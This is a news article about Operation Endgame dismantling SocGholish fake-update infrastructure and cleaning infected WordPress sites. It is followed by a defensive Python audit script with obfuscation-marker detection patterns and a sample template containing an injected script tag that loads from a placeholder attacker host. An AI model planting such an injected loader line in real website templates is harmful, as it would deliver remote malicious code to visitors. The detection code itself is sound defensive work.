HackMyIP
2026-06-19 The Hacker News

Operation Endgame Disrupts SocGholish: 106 Servers Down, 15K WordPress Sites Cleaned

Tags: Malware, Threat Intel, Incident Response

In a significant blow against one of the web's most persistent malware distribution networks, Dutch law enforcement, working alongside the FBI, the Royal Canadian Mounted Police, and Germany's Bundeskriminalamt, has dismantled 106 servers tied to the SocGholish (FakeUpdates) JavaScript downloader and cleaned 14,971 infected WordPress websites as part of Operation Endgame. The coordinated takedown, announced in 2026, also led to notifications being sent to affected site owners, instructing them to update their content management systems, rotate compromised credentials, and remove any unauthorized administrator accounts. "With these actions we deprive cybercriminals of access to infected computer systems," said Maikel Rollman of the Netherlands National High Tech Crime Unit, adding that the disruption limits the malware's use in attacks on critical infrastructure worldwide. The effort builds on the same international framework that, in 2024, took down dozens of loader and dropper families used by ransomware affiliates across Europe and North America.

Active since 2017, SocGholish operates as a JavaScript-based downloader delivered through compromised websites that masquerade as legitimate update prompts for Google Chrome, Mozilla Firefox, and other widely used software. Once executed, it establishes a foothold in victim systems, effectively enrolling them in a botnet that is then rented out to threat actors tracked under aliases such as Gold Prelude, Mustard Tempest, Purple Vallhund, TA569, and UNC1543. According to the FBI's Cyber Division, secondary payloads distributed through SocGholish have included the Dridex banking trojan, Raspberry Robin (Roshtyak), the Gholoader loader, and ransomware families operated by Evil Corp (DEV-0243 / Indrik Spider / UNC2165), LockBit, and RansomHub. In November 2025, Arctic Wolf observed the RomCom cluster leveraging SocGholish access to deploy the Mythic Agent, underscoring the malware's role as a commodity initial-access service for both financially motivated and espionage-oriented operators.

Technically, SocGholish infections on WordPress sites occur through direct JavaScript injections, intermediate loader files, and tampered update scripts, often placed in header or footer templates after a successful compromise of administrator credentials. Orange Cyberdefense has tracked IP-geolocated compromises spanning dozens of countries, with the bulk concentrated in North America and Western Europe. Website owners are urged to audit their CMS integrity, validate their SSL/TLS configurations with an SSL/TLS checker, run WHOIS lookups on any newly registered or suspicious domains referenced in their page source, and rotate all administrator and database credentials, checking the old ones against known breach data with a password checker. Operation Endgame officials cautioned that the SocGholish takedown marks only the first phase of a broader campaign, and that more infrastructure is expected to be seized in the coming months.
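As an added example (not code from the article or from any organization it names), a small Python audit that scans WordPress theme templates such as header.php and footer.php for the two injection shapes described above: script tags loading from hosts outside a site-specific allow-list, and inline scripts carrying common obfuscation markers. The allow-list, file paths and the attacker host are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Assumption: hosts this site legitimately loads scripts from (site-specific allow-list).
ALLOWED_SCRIPT_HOSTS = {"example-site.test", "cdnjs.cloudflare.com"}

SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)
INLINE_SCRIPT_RE = re.compile(r"<script(?![^>]*\bsrc\b)[^>]*>(.*?)</script>", re.I | re.S)
HOST_RE = re.compile(r"^(?:https?:)?//([^/?#]+)", re.I)
# Markers typical of obfuscated inline loaders; a hit is a lead for review, not proof.
OBFUSCATION_MARKERS = ("eval(", "atob(", "fromCharCode", "unescape(", "document.write(")

@dataclass(frozen=True)
class Finding:
    path: str
    kind: str    # "external-script" or "obfuscated-inline"
    detail: str

def scan_template(path: str, content: str) -> list[Finding]:
    """Flag external <script src> outside the allow-list and suspicious inline scripts."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(content):
        m = HOST_RE.match(src.strip())
        # Relative paths (no host) are left alone; absolute URLs must hit the allow-list.
        if m and m.group(1).lower() not in ALLOWED_SCRIPT_HOSTS:
            findings.append(Finding(path, "external-script", src))
    for body in INLINE_SCRIPT_RE.findall(content):
        hits = [mk for mk in OBFUSCATION_MARKERS if mk in body]
        if hits:
            findings.append(Finding(path, "obfuscated-inline", ",".join(hits)))
    return findings

def scan_all(templates: dict[str, str]) -> list[Finding]:
    return [f for p, c in templates.items() for f in scan_template(p, c)]

# Constructed sample: header.php carries a fake-update loader, footer.php is clean.
SAMPLE_TEMPLATES = {
    "wp-content/themes/site/header.php": (
        "<?php wp_head(); ?>\n"
        "<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js'></script>\n"
        "<script src='https://updates.attacker-placeholder.test/update.js'></script>\n"
        "<script>eval(atob('Li4u'));</script>\n"
    ),
    "wp-content/themes/site/footer.php": "<?php wp_footer(); ?>\n<script>console.log('ok');</script>\n",
}

if __name__ == "__main__":
    for f in scan_all(SAMPLE_TEMPLATES):
        print(f"{f.path}: {f.kind} -> {f.detail}")
```

In a real audit, read the files from the theme directory and compare against a known-good copy from version control; a new external host or an obfuscated inline block in a template is the signal to pull the site offline and start credential rotation.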

Source: The Hacker News
